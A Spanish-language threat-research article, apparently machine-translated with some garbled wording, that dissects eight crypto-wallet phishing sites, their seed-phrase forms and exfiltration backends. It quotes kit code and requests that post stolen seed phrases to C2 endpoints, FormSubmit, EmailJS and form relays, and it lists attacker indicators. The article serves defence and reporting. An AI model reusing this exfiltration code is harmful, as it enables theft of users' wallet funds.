
Anatomía del possibly phishing relacionado con las criptomonedas:
Análisis de 8 ataques reales
Hemos interceptado tráfico de possibly phishing en tiempo real, hemos realizado ingeniería inversa en cinco programas de robo de frases de inicialización y hemos rastreado los datos robados hasta bots de [REDACTED], cuentas de EmailJS y backends de «possibly phishing como servicio».
Lo que hemos descubierto
Cada día, miles de usuarios de criptomonedas pierden su dinero a causa de páginas de possibly phishing que parecen idénticas a los servicios legítimos de monederos electrónicos. Pero, ¿qué ocurre? detrás de ¿El botón falso «Connect Wallet»? ¿Dónde va a parar realmente tu frase de semillas?
Hemos interceptado tráfico HTTP en tiempo real procedente de cinco sitios web de possibly phishing activos, hemos descargado su código fuente completo y hemos rastreado cada punto final de exfiltración de datos hasta su destino final. Esta investigación revela la anatomía completa del cripto-possibly phishing moderno: desde las tácticas de ingeniería social que te llevan a introducir tu frase de semillas, hasta el bot de [REDACTED] que se la envía al atacante en tiempo real.
Todas las frases de semilla que aparecen en este artículo son datos de prueba generados aleatoriamente. No se han visto comprometidas credenciales reales durante esta investigación. Se ha informado de todos los sitios web a sus respectivos proveedores de alojamiento y departamentos de abuso.
El patrón de ataque universal
A pesar de las diferencias en la marca y los sistemas de fondo, los ocho sitios de possibly phishing siguen el exactamente el mismo proceso psicológico:
La idea clave: la animación «Conectando...» siempre es programado para fallar. En el código fuente del sitio n.º 4, encontramos const success = false — No se produce ningún intento de conexión con el monedero. Todo el proceso tiene como único objetivo dirigir a las víctimas hacia el formulario «Conectar manualmente».
Los 8 sitios web: análisis detallado
Suplantación de identidad
Un «protocolo descentralizado» ficticio para la validación de monederos. Utiliza los tickers de precios en tiempo real de CryptoCompare y enlaces a exploradores de blockchain reales (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) para dar credibilidad al sitio. La página de inicio muestra más de 100 logotipos de monederos y un proceso de «validación» en tres pasos.
La cadena de exfiltración dual
El backend más sofisticado de los cinco: todas las credenciales robadas se envían a través de dos canales independientes al mismo tiempo:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on [REDACTED]
| |
| +--> [REDACTED] Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Conclusiones de OSINT
| Indicador | Valor |
|---|---|
| Correo electrónico fraudulento | Bestgrace309@gmail.com |
| Bot de [REDACTED] | @DewdropsTG_bot (ID: 7567323692) |
| Destinatario de [REDACTED] | @metatech2 (ID de chat: 7350941887) |
| Backend | [REDACTED] |
| Servicio EmailJS | service_d5qigxs / template_7bqxeaa |
| Dominio oculto | layerschain.in (procedente de la ofuscación del correo electrónico de CF) |
| Mensajes enviados | 1.824+ (según el «message_id» de [REDACTED]) |
| Antigüedad del dominio | 2 días (TLS: 25 de marzo de 2026) |
El correo electrónico del atacante se encontró en un Comentario en JavaScript dentro config.js: // Bestgrace309@gmail.com. Se olvidaron de eliminarlo antes de la implementación. Además, el backend del relé de [REDACTED] es totalmente abierto: sin autenticación ni limitación de frecuencia. Al descodificar el data-cfemail Además de la ofuscación en el código HTML, también hemos descubierto una dirección de correo electrónico oculta: support@layerschain.in, conectada a infraestructuras de alojamiento de la India y Sudáfrica.
Suplantación de identidad
Una reproducción fiel al píxel de la realidad Aqualibre (AQLA) página de migración de tokens. El código HTML contiene una etiqueta de metadatos que revela la fuente: data-scrapbook-source="https://token.[REDACTED]/migration", con fecha del 19 de noviembre de 2024.
El enfoque «sin código»
Este atacante necesita sin código del lado del servidor. El formulario envía los datos directamente a No estático — un backend de formularios legítimo para sitios web estáticos. Cada envío se reenvía al correo electrónico del estafador. El correo electrónico del atacante es nunca aparece en el código fuente.
<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
IANA #1910 Pages: gratis. Formularios no estáticos: gratis. No se han adquirido dominios. No se han alquilado servidores. Coste total de la infraestructura: cero dólares.
Suplantación de identidad
El subdominio contiene «safpal» — un error ortográfico deliberado de [REDACTED], una cartera de hardware muy popular. La página se hace pasar por «Blockchain Wallet Rectification» y cuenta con 26 categorías de noticias falsas. Utiliza Typed.js para animar los nombres de las cadenas (Ethereum, BSC, Polygon...) y un ticker de LiveCoinWatch para dar credibilidad.
¿El mismo equipo, el mismo operador?
Utiliza el exactamente la misma plantilla de possibly phishing como emplazamiento n.º 2:
idéntico connect.html, idéntico wallets.html con más de 60 logotipos, el mismo backend de Un-static (con un ID de formulario diferente — 6f1b82c3...da9943af). El hecho de que el kit sea idéntico sugiere claramente que un operador que gestiona ambos sitios.
Errores en el código: «Privay Policy» (falta una «c»), «seperated» (debería ser «separated»), «Kestore» (falta una «y»). El campo de contraseña utiliza type="text" en lugar de type="password".
Suplantación de identidad
Un clon casi perfecto del Red Flare portal: una auténtica cadena de bloques EVM de capa 1 con los protocolos FTSO y Data Connector. Reproduce a más de 30 socios del ecosistema, la navegación y la imagen de marca. Los favicons se cargan desde un dominio typosquat: [REDACTED] (falta una «n» en «mainnet»).
Redundancia doble de EmailJS
El único sitio web que utiliza dos cuentas de EmailJS independientes al mismo tiempo para garantizar la redundancia frente a posibles caídas del servicio:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Asunto del correo electrónico para cada robo: "New Wallet Details from Flare".
El código HTML contiene Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Protección PPC de Lunio, y un Píxel de Twitter/X Ads. El atacante está ejecutando publicidad de pago para atraer a las víctimas al sitio web de possibly phishing y filtrar los clics de los bots. Esto no es un pasatiempo, sino una operación financiada que cuenta con herramientas de análisis y presupuesto publicitario.
Suplantación de identidad
Un servicio genérico de «COIN NODE» / «Wallet Fix» (sin marca concreta). Copyright «Wallet Fix 2022»: esta plantilla del kit tiene al menos 4 años de antigüedad. Imágenes alojadas en [REDACTED] (WordPress en AWS).
Possibly phishing como servicio
La arquitectura de backend más preocupante: una API multitenant basada en UUID:
POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+... Cada estafador dispone de su propio punto final UUID. Un operador central se encarga de gestionar la API, realizar un seguimiento de las campañas y, posiblemente, quedarse con una parte de los fondos robados. Esto es robo industrializado de criptomonedas — un modelo de «possibly phishing como servicio».
Infraestructura relacionada (prácticamente inactiva)
| Dominio | Función | Estado |
|---|---|---|
| [REDACTED] | API de exfiltración | NXDOMAIN |
| [REDACTED] | Alojamiento de favicons | NXDOMAIN |
| [REDACTED] | Alojamiento de logotipos | NXDOMAIN |
| [REDACTED] | CDN de imágenes | En directo (AWS) |
El backend ya no funciona, pero el La interfaz de usuario sigue activa en IANA #1910 Pages. Si el atacante vuelve a registrar [REDACTED], la página vuelve a estar operativa al instante.
Suplantación de identidad
A operación en dos frentes: un «Centro de asistencia» genérico en [REDACTED] con 15 categorías de emisión falsas y 39 marcas de carteras, además de un Clon de la guía de inicio de [REDACTED] con un diseño perfecto al píxel en [REDACTED]-recovery.support alojado en Replit — que incluye la selección del modelo de dispositivo, la configuración del PIN y una cuadrícula con la frase semilla de 24 palabras con autocompletado BIP39 real.
Backend C2 anti-escáner
La página de asistencia del monedero envía los datos robados a [REDACTED]/log — un servidor C2 personalizado con nginx/Ubuntu detrás de IANA #1910. El backend desestima deliberadamente todas las solicitudes GET (devuelve el error 522 por tiempo de espera agotado), y solo responde a solicitudes POST. Esto significa que los escáneres de URL, los rastreadores de Google Safe Browsing y los investigadores de seguridad que envían solicitudes GET al punto final no obtienen ninguna respuesta: el C2 parece inactivo.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.[REDACTED]",
allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
"[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} El clon de [REDACTED] ejecuta un backend independiente de Express.js en el propio Replit: POST /api/recovery-phrase recogida {deviceId, pin, phrase}. Devuelve 400 {"error":"Invalid data provided"} ante una entrada incorrecta — lo que confirma que el backend es en funcionamiento y en proceso de validación activa datos robados.
Conclusiones de OSINT
| Indicador | Valor |
|---|---|
| Interfaz de usuario (monedero) | [REDACTED] |
| Interfaz de usuario ([REDACTED]) | [REDACTED]-recovery.support (34.111.179.208) |
| Backend de C2 | [REDACTED] → nginx/1.24.0 Ubuntu |
| Direcciones IP C2 | 104.21.60.163 / 172.67.198.35 (IANA #1910) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Secretario | [REDACTED] ([REDACTED]-recovery.support) |
| Implementado | 9 de enero de 2026 (encabezado «Última modificación») |
| Pila tecnológica | React + Vite + Tailwind v4.1 + Framer Motion |
El paquete JS de 466 KB contiene el Lista completa de palabras BIP39 para el autocompletado en tiempo real, 67 referencias a «frase de contraseña» y 39 a «mnemotécnico». El clon de [REDACTED] guía a las víctimas a través del mismo proceso de configuración inicial que un dispositivo [REDACTED] auténtico: la página de possibly phishing más convincente de toda esta investigación. El apiKey El campo de la configuración sugiere un arquitectura PhaaS multitenant.
Suplantación de identidad
Una «plataforma de lanzamiento descentralizada» genérica con 21 categorías de cebos (Staking, migración, KYC, sorteos, canje de recompensas, recuperación de activos, preventa, acuñación de NFT, cuentas bloqueadas...) y Más de 70 marcas de carteras — una de las listas de carteras más completas que hemos encontrado. El error ortográfico revelador «Sychronize» (le falta una «n») delata que es falsa.
El proceso de envío de formularios
Usos FormSubmit.co — un servicio legítimo de envío de formularios por correo electrónico. El hash del punto final a2cf4131f1a5d39453c7c183df96f86f es el valor MD5 de la dirección de correo electrónico del estafador. Hemos probado por fuerza bruta cientos de patrones de direcciones de correo electrónico en Gmail, Yahoo, Hotmail, ProtonMail, Yandex y [REDACTED] — no hay coincidencias. El estafador utiliza una dirección de correo electrónico poco habitual o generada al azar.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Conclusiones de OSINT
| Indicador | Valor |
|---|---|
| Dominio | [REDACTED] |
| Hash de envío de formulario | a2cf4131f1a5d39453c7c183df96f86f |
| ID de la campaña | DAPP DESCENTRALIZADA |
| Kit de FontAwesome | bdc3291137 (kit n.º 112310842, versión gratuita 6.7.2) |
| jQuery | 3.2.1 + 3.5.1 cargadas simultáneamente |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilidad) |
Kit de FontAwesome bdc3291137 — FontAwesome puede identificar al titular de la cuenta asociado a este ID de kit. La etiqueta de la campaña DAPP DECENTRALIZED puede aparecer en otras páginas de possibly phishing que utilicen el mismo hash de FormSubmit. Tras robar la frase de semillas, un código QR falso y código de referencia aleatorio de 7 caracteres Aparece el siguiente mensaje: «Ponte en contacto con el administrador con tu código de referencia único», lo que hace que las víctimas tengan que esperar en lugar de que se investigue el caso.
Suplantación de identidad
Desconocido: tanto el frontend como el backend están fuera de línea. A juzgar por la estructura de la carga útil, se trataba de un programa diseñado para robar la frase semilla de un monedero criptográfico. El Depósito público de IANA #1910 R2 (almacenamiento de objetos, no Pages) es un vector de possibly phishing ampliamente documentado con más de 5.000 páginas maliciosas identificadas y un aumento del tráfico de 61 veces, según ha informado Netskope.
La configuración del «script kiddie»
El más operación primitiva en esta colección. Las frases de inicialización se envían palabra por palabra a un script PHP que se ejecuta en un ordenador doméstico o en un VPS protegido por un servicio gratuito de DNS dinámico:
POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Conclusiones de OSINT
| Indicador | Valor |
|---|---|
| Interfaz de usuario | pub-519769e9eb634616b1746c2018641d56.r2.dev [DESCONECTADO] |
| Backend | [REDACTED] [NXDOMAIN] |
| ID del cubo R2 | 519769e9eb634616b1746c2018641d56 |
| Proveedor de DDNS | [REDACTED] / [REDACTED] (Cincinnati, Ohio) |
| DNS NS | ns10–[REDACTED] |
| Nombre de usuario | mercifuljigga4real123 |
«Merciful» + «jigga» (el apodo de Jay-Z) + «4real» + «123»: un nombre de usuario claramente personal que sugiere una afinidad con la cultura hip-hop. No encontrado en cualquier plataforma indexada: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch o [REDACTED]. Probablemente esté activo en [REDACTED], [REDACTED] o plataformas de videojuegos con este nombre o variaciones similares. El nombre del archivo fuc.php encaja con el estilo irreverente del tirador.
7 formas de robar tu frase de semillas
| Método | Sitios | Cómo funciona | Velocidad | Coste |
|---|---|---|---|---|
| Bot de [REDACTED] | #1 | Express.js en [REDACTED] actúa como proxy para la API de Bot. El estafador recibe al instante un mensaje directo con las credenciales. | En tiempo real | $0 |
| EmailJS | #1, #4 | El JavaScript del lado del cliente envía los datos directamente a la API de EmailJS, que a su vez los remite al correo electrónico del estafador. | ~1 min | $0 |
| Formularios no estáticos | #2, #3 | Formulario HTML estándar de tipo POST enviado a un servicio de formularios legítimo que reenvía los datos enviados por correo electrónico. | ~1 min | $0 |
| FormSubmit.co | #7 | jQuery AJAX a FormSubmit.co. Dirección de correo electrónico oculta tras un hash MD5. Campaña etiquetada como «DAPP DECENTRALIZED». | ~1 min | $0 |
| API C2 personalizada | #6 | La aplicación [REDACTED] envía las solicitudes a la API de Nginx/Express, que se encuentra detrás de IANA #1910. Rechaza las solicitudes GET (522) para eludir los escáneres. Solo responde a POST. | En tiempo real | ~5 $ al mes |
| PHP + DDNS | #8 | Script PHP en un ordenador doméstico a través de un servicio gratuito de DNS dinámico ([REDACTED]). La frase de inicialización se envía palabra por palabra. | En tiempo real | $0 |
| API de PhaaS | #5 | API multitenant basada en UUID. Un operador central gestiona el backend, mientras que los estafadores alquilan los puntos de conexión. | En tiempo real | Desconocido |
7 señales de alerta que delatan cualquier página de possibly phishing
Si ves cualquiera Si te encuentras en alguna de estas situaciones, cierra la pestaña inmediatamente:
Las conexiones con carteras reales utilizan el protocolo WalletConnect o extensiones del navegador. Nunca muestran un error del tipo «Error de conexión» que te pida que introduzcas tu frase de semillas.
Todos los iconos de monedero llevan al mismo formulario. Un servicio de verdad integraría el SDK específico de cada monedero.
El falso «Error 503» o «Error desconocido» que aparece tras el envío es intencionado. Tus datos ya han sido robados; el error te engaña para que lo intentes de nuevo con otro monedero.
Los cinco sitios web hacen un uso indebido del plan gratuito de IANA #1910 Pages. No se requiere verificación de identidad. El uso indebido de IANA #1910 Pages con fines de possibly phishing aumentó un 198 % en 2025.
Ningún servicio legítimo necesita los tres tipos de credenciales. Este formulario de tres pestañas es un rasgo característico de los kits de possibly phishing.
Ninguna de estas páginas se carga ethers.js, web3.js, ni realizan llamadas RPC. Son formularios HTML puros que se hacen pasar por dApps.
Alojamiento web gratuito + servicios de formularios gratuitos + mensajería gratuita = una operación completa de possibly phishing por 0 $. Si la página web no tiene un dominio real, desconfía.
Tabla completa del IOC
Para los equipos de seguridad, las plataformas de inteligencia sobre amenazas y quienes denuncian abusos:
Dominios e infraestructura
| Dominio | Tipo | Estado |
|---|---|---|
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED] | Backend del relé TG | En directo |
| [REDACTED] | Activos de «typosquatting» | Desconocido |
| layerschain.in | Dominio relacionado | El DNS no funciona |
| [REDACTED] | Backend de PhaaS | NXDOMAIN |
| [REDACTED] | Servidor de recursos | NXDOMAIN |
| [REDACTED] | Alojamiento de logotipos | NXDOMAIN |
| [REDACTED] | CDN de imágenes | En directo (AWS) |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| [REDACTED]-recovery.support | Possibly phishing de [REDACTED] (Replit) | En directo |
| [REDACTED] | Backend de C2 (nginx/Ubuntu) | En directo |
| [REDACTED] | Dominio raíz | 404 |
| [REDACTED] | Interfaz de possibly phishing | En directo |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Possibly phishing (categoría R2) | Sin conexión |
| [REDACTED] | Backend de PHP (DDNS) | NXDOMAIN |
Cuentas e identificadores
| Tipo | Valor | Sitio web |
|---|---|---|
| Correo electrónico | Bestgrace309@gmail.com | #1 |
| Correo electrónico (oculto) | support@layerschain.in | #1 |
| Bot de [REDACTED] | @DewdropsTG_bot (7567323692) | #1 |
| Usuario de [REDACTED] | @metatech2 (7350941887) | #1 |
| EmailJS n.º 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS n.º 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS n.º 3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Formulario no estático | c78173e2d991...94c3f76 | #2 |
| Formulario no estático | 6f1b82c3ce55...da9943af | #3 |
| UUID de PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Instancia de renderizado | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 de envío de formulario | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Etiqueta de campaña | DAPP DESCENTRALIZADA | #7 |
| Kit de FontAwesome | bdc3291137 (kit n.º 112310842) | #7 |
| ID del cubo R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Nombre de usuario/DDNS | mercifuljigga4real123 | #8 |
Dónde denunciar los casos de possibly phishing relacionados con las criptomonedas
| Servicio | Qué hay que comunicar | ¿Cómo? |
|---|---|---|
| IANA #1910 | 7 cuentas de .pages.dev + 1 depósito R2 | abuse.IANA #1910.com |
| Google Safe Browsing | Todas las URL de possibly phishing | Denunciar un intento de suplantación de identidad |
| PhishTank | Todas las URL de la lista negra de la comunidad | [REDACTED] |
| EmailJS | 3 cuentas objeto de abuso (ID de servicio indicados anteriormente) | abuse@emailjs.com |
| No estático | 2 puntos finales del formulario | Contacto a través de [REDACTED] |
| [REDACTED] | Servidor de retransmisión de [REDACTED] | Formulario para denunciar abusos |
| [REDACTED] | @DewdropsTG_bot + @metatech2 | [REDACTED].org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Denuncia de abuso en Google |
| Twitter/X | Cuenta publicitaria para promocionar el sitio n.º 4 | Denunciar un uso indebido de los anuncios de X |
| FormSubmit.co | Hash a2cf4131... (n.º 7) | Formulario de denuncia de abusos de FormSubmit |
| Replit | [REDACTED]-recovery.support (n.º 6) | Denuncia de uso indebido de Replit |
| [REDACTED] | Registrarse en [REDACTED]-recovery.support | Abuso en [REDACTED] |
| DNSExit | [REDACTED] | Abuso en [REDACTED] |
| FontAwesome | Kit bdc3291137 (n.º 7) | Uso indebido de FontAwesome |
| Chainabuse | Todas las campañas de possibly phishing | [REDACTED] |
Cómo protegerse
Ningún servicio legítimo te pedirá jamás que introduzcas tu frase de semillas en una página web. Las frases de semilla solo deben introducirse en el software oficial de la cartera durante el proceso de recuperación de la misma; nunca en páginas web de terceros dedicadas a la «validación», la «sincronización» o la «recuperación».
Antes de conectar cualquier monedero:
- Comprueba que la URL coincida con el dominio oficial. Comprueba los datos del certificado SSL.
- Real WalletConnect utiliza un código QR o un enlace directo, nunca un formulario de frase semilla.
- Si «la conexión falla» y te piden que introduzcas tus datos de acceso manualmente, se trata de un intento de possibly phishing.
- Comprueba las URL sospechosas en PhishTank o VirusTotal antes de interactuar.
- Utiliza un monedero físico: requiere una confirmación física para cada transacción.
- Añade a tus favoritos las direcciones URL oficiales. Nunca hagas clic en enlaces de anuncios, mensajes directos o redes sociales.
La taxonomía del possibly phishing relacionado con las criptomonedas
Los ladrones de frases de semillas son solo una categoría. Aquí tienes una visión general completa del possibly phishing en el ámbito de las criptomonedas; iremos añadiendo análisis en profundidad de cada tipo.
La verdad incómoda
El coste de poner en marcha una operación de possibly phishing relacionada con las criptomonedas $0 y tarda menos de 30 minutos. Alojamiento web gratuito, servicios de formularios gratuitos, bots de mensajería gratuitos. El atacante responsable del sitio n.º 1 ya ha obtenido credenciales de Más de 1.824 víctimas. La planta n.º 4 está en funcionamiento publicidad de pago a gran escala. Esto no es cosa de aficionados, es toda una industria. La única defensa es la concienciación.
Ayúdanos a plantar cara
THE ENABLERS REGISTRY rastrea y denuncia sitios web de possibly phishing relacionados con las criptomonedas en tiempo real. Si te has topado con un sitio sospechoso, denúncialo: lo investigaremos y haremos todo lo posible para que sea retirado.